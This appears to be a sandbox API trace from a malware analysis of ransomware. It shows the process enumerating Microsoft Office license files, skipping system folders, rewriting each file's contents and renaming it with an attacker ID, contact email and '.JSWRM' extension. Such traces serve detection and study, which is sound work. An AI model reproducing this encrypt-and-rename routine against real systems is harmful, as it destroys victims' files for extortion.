[0106.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.837] CloseHandle (hObject=0x45c) returned 1 [0106.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0106.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0106.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.839] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe82c4f18, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe82c4f18, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe83a9d5d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Grace-ul-oob.xrm-ms", cAlternateFileName="PECE86~1.XRM")) returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.839] lstrcmpiW (lpString1="PersonalR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.840] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0106.840] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0106.840] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0106.842] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.842] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0106.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.842] CloseHandle (hObject=0x45c) returned 1 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0106.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0106.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0106.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0106.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0106.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0106.844] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8121516, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8121516, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8206352, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PE80C8~1.XRM")) returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.844] lstrcmpiW (lpString1="PersonalR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0106.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0106.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.848] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0106.848] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0106.848] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0106.850] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.850] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0106.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.850] CloseHandle (hObject=0x45c) returned 1 [0106.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0106.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0106.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0106.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0106.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0106.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.852] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe80fb2be, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe80fb2be, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe81e00ed, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5202, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PEB58E~1.XRM")) returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.852] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0106.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.853] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20994) returned 1 [0106.853] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 